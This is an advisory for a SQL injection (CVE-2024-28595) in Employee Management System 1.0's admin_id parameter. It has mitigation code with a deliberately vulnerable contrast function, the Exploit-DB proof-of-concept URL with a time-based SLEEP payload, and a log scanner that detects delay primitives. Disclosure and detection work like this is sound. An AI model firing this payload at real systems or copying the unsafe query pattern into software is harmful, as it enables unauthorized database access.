Vendor: Employee Management System
Author: Shubham Pandey
CVSS: 6.1 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Employee Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
CVE: CVE-2024-28595
CPE: a:employee_management_system:employee_management_system:1.0
Platforms Tested: Windows, Linux
Year: 2024

Employee Management System 1.0 – ‘admin_id’ SQL Injection

SQL Injection vulnerability in Employee Management System version 1.0 allows attackers to execute arbitrary SQL commands through the admin_id parameter in update-admin.php. An attacker can manipulate the admin_id parameter to inject malicious SQL queries, leading to unauthorized access or data manipulation.

Mitigation:

To mitigate this vulnerability, use parameterized queries or prepared statements so that user input is always bound as data rather than spliced into the SQL text. Additionally, limiting database privileges for the application account and validating input (admin_id should only ever be an integer) reduce both the likelihood and the impact of such attacks.
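The following is an added example, not code from Employee Management System or from the advisory author, showing the three mitigations side by side in PHP/mysqli for a handler of the kind update-admin.php would need: integer validation of admin_id, a prepared statement in place of string concatenation (the vulnerable pattern is kept for contrast only), and a least-privilege database account. The table name `admin`, its columns, the database name `ems` and the account `ems_app` are assumptions for illustration.

```php
<?php
declare(strict_types=1);
// Added example (not the project's code): a hardened handler for an
// admin_id parameter. Table/column/connection names are assumptions.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on SQL errors

/**
 * Input validation: admin_id must be a positive decimal integer.
 * Anything else (e.g. "3'||(SELECT ...)") yields null and is rejected
 * before any query is built.
 */
function parseAdminId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Vulnerable pattern, shown for contrast only: the raw parameter is spliced
 * into the SQL text, so a quote in the input changes the query structure.
 */
function loadAdminUnsafe(mysqli $db, string $rawId): ?array
{
    $result = $db->query("SELECT * FROM admin WHERE admin_id = '" . $rawId . "'");
    return $result->fetch_assoc() ?: null;
}

/**
 * Hardened pattern: a prepared statement sends the query text and the value
 * separately; the value is bound as an integer and is never parsed as SQL.
 */
function loadAdminSafe(mysqli $db, int $adminId): ?array
{
    $stmt = $db->prepare('SELECT admin_id, username, email FROM admin WHERE admin_id = ?');
    $stmt->bind_param('i', $adminId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

/** Same idea for the UPDATE an "update-admin" page would issue. */
function updateAdminEmail(mysqli $db, int $adminId, string $email): int
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid email');
    }
    $stmt = $db->prepare('UPDATE admin SET email = ? WHERE admin_id = ?');
    $stmt->bind_param('si', $email, $adminId);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

// Request handling: fail closed on bad input instead of building a query.
$rawId = $_GET['admin_id'] ?? null;
$adminId = is_string($rawId) ? parseAdminId($rawId) : null;
if ($adminId === null) {
    http_response_code(400);
    exit('invalid admin_id');
}

// Least privilege: connect as an account that holds only the grants this page
// needs, e.g. GRANT SELECT, UPDATE ON ems.admin TO 'ems_app'@'localhost';
// (database, account and password are placeholders).
$db = new mysqli('localhost', 'ems_app', 'PLACEHOLDER_PASSWORD', 'ems');
$db->set_charset('utf8mb4');

$admin = loadAdminSafe($db, $adminId);
if ($admin === null) {
    http_response_code(404);
    exit('no such admin');
}
```

The integer check alone would already stop the quoted payload in this advisory, but it is the prepared statement that makes the query safe regardless of what the parameter contains; validation is defence in depth, and the restricted account caps what a future injection elsewhere in the application could read or change.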

Exploit-DB raw data:

# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi
# Date: 20-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-28595
# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.
# POC:
1. Here we go to: http://127.0.0.1/taskmatic/index.php
2. Now login with default Username and Password.
3. Visit the URL:
http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843 WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'
4. Page will load for 5 seconds because of time-based SQL injection.
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md
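For defenders, the following is an added example (not part of the advisory or the author's PoC) of detecting the time-based technique the PoC uses: a PHP script that parses web server access-log lines, URL-decodes every query-string parameter and flags requests carrying a delay function (MySQL SLEEP/BENCHMARK, PostgreSQL pg_sleep, MSSQL WAITFOR DELAY). The Apache combined log format and the three sample lines are constructed assumptions; the second line reproduces the advisory's payload URL-encoded.

```php
<?php
declare(strict_types=1);
// Added example, not from the original page: flag access-log requests whose
// query string carries a time-delay SQL primitive. Log lines are constructed.

const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [20/Mar/2024:10:01:02 +0000] "GET /taskmatic/update-admin.php?admin_id=3 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Mar/2024:10:01:09 +0000] "GET /taskmatic/update-admin.php?admin_id=3%27%7C%7C%28SELECT%200x697a7843%20WHERE%205649%3D5649%20AND%20%28SELECT%202097%20FROM%20%28SELECT%28SLEEP%285%29%29%29JzJH%29%29%7C%7C%27 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Mar/2024:10:02:00 +0000] "GET /taskmatic/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG;

// Delay primitives used by time-based blind SQL injection, engine by engine.
const DELAY_MARKER = '/\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b/i';

/**
 * Returns one hit per (request, parameter) pair that contains a delay marker.
 * Each hit: ip, time, path, param, marker.
 */
function findTimeBasedSqli(string $log): array
{
    $hits = [];
    foreach (explode("\n", $log) as $line) {
        // Apache combined format: client, ident, user, [time], "METHOD target HTTP/x"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)/', $line, $m)) {
            continue;
        }
        [, $ip, $time, $target] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;
        }
        parse_str($query, $params); // parse_str URL-decodes each value once
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue; // nested array parameters are out of scope here
            }
            $decoded = rawurldecode($value); // catch double-encoded payloads too
            if (preg_match(DELAY_MARKER, $decoded, $mk)) {
                $hits[] = [
                    'ip'     => $ip,
                    'time'   => $time,
                    'path'   => parse_url($target, PHP_URL_PATH),
                    'param'  => (string)$name,
                    'marker' => strtoupper(preg_replace('/\s+/', ' ', trim($mk[0], " ("))),
                ];
            }
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    foreach (findTimeBasedSqli(SAMPLE_LOG) as $h) {
        printf("%s %s %s param=%s marker=%s\n", $h['time'], $h['ip'], $h['path'], $h['param'], $h['marker']);
    }
}
```

Run on the constructed sample it reports only the second line (param=admin_id, marker=SLEEP). Two caveats worth building in before using this on real logs: POST bodies are not in the access log, so the same payload sent in a form would be missed unless the application logs request bodies or a WAF sits in front, and a marker-only rule should be corroborated with response-time data (a request to update-admin.php that takes about five seconds longer than its neighbours is the other half of the signal).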